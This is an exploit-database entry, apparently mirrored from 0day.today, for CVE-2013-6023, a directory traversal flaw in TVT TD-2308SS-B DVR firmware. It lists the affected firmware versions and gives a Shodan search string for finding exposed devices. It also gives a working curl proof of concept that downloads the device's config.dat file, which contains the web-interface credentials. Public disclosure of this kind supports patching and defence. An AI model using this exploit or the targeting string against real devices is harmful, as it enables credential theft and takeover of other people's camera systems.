Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtCesar Neira1337DAY-ID-21605
HistoryDec 02, 2013 - 12:00 a.m.

TVT TD-2308SS-B DVR - Directory Traversal Vulnerability

2013-12-0200:00:00
Cesar Neira
0day.today
214

0.152 Low

EPSS

Percentile

95.9%

JSON

TVT TD-2308SS-B DVR and possibly other models running firmware version 3.2.0.P-3520A-00 contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as the config.dat file for the device which contains the credentials for the web interface. For example:
http://[IP ADDRESS]/…/…/…/mnt/mtd/config/config.dat

# Exploit Title: TVT TD-2308SS-B DVR directory traversal
# Shodan Dork: "Cross Web Server"
# Date: 01 Dec 2013
# Disclosure date: 10 Sep 2013
# Exploit Author: Cesar Neira
# Vendor Homepage: http://en.tvt.net.cn/
# Affected Firmware Versions:
3.1.43.B
3.1.43.P
3.1.6.P-1.0.2.1-03
3.1.75.B-1.0.2.1-00
3.1.7.B-1.0.2.1-00
3.1.81.B-1.0.2.1-00
3.1.83.B-1.0.2.1-00
3.1.83.P-1.0.4.2-03
3.1.87.P-1.0.4.2-17
3.1.91.P-1.0.2.1-03
3.1.92.P-1.0.2.1-00
3.1.93.B-1.0.2.1-17
3.2.0.B-1.0.2.1-17
3.2.0.P-1.0.2.1-03
3.2.0.P-1.0.2.1-17
3.2.0.P-1.0.6.0.32-00
3.2.0.P-3520A-00
3.2.0.P-3520A-03
3.2.0.P-3531-00
3.2.0.P-3531-11
3.2.0.P-FH-00
3.2.9.P-3520A-06
maybe others.
# Tested on: TVT DVR TD-2308SS-B
# CVE : CVE-2013-6023
# References:
http://www.kb.cert.org/vuls/id/785838
http://alguienenlafisi.blogspot.com/2013/10/dvr-tvt-directory-traversal.html
 
POC:
 
curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings
 
-- 
Cesar Neira <[emailΒ protected]>
http://alguienenlafisi.blogspot.com
Root-Node

#  0day.today [2018-03-19]  #

Related

cve 1
cvelist 1
seebug 1
prion 1
nvd 1
packetstorm 1
exploitpack 1
openvas 1
cert 1
exploitdb 1
cve
cve
CVE-2013-6023
2013-11-02 21:55:02
cvelist
cvelist
CVE-2013-6023
2013-11-02 21:00:00
seebug
seebug
TVT TD-2308SS-B DVR - Directory Traversal Vulnerability
2014-07-01 00:00:00
prion
prion
Directory traversal
2013-11-02 21:55:00
nvd
nvd
CVE-2013-6023
2013-11-02 21:55:02
packetstorm
packetstorm
TVT TD-2308SS-B DVR Directory Traversal
2013-12-01 00:00:00
exploitpack
exploitpack
TVT TD-2308SS-B DVR - Directory Traversal
2013-12-01 00:00:00
openvas
openvas
TVT DVR Directory Traversal Vulnerability
2013-12-05 00:00:00
cert
cert
TVT TD-2308SS-B DVR contains a directory traversal vulnerability
2013-10-25 00:00:00
exploitdb
exploitdb
TVT TD-2308SS-B DVR - Directory Traversal
2013-12-01 00:00:00

0.152 Low

EPSS

Percentile

95.9%

JSON
Related for 1337DAY-ID-21605
cve1cvelist1seebug1prion1nvd1packetstorm1exploitpack1openvas1cert1exploitdb1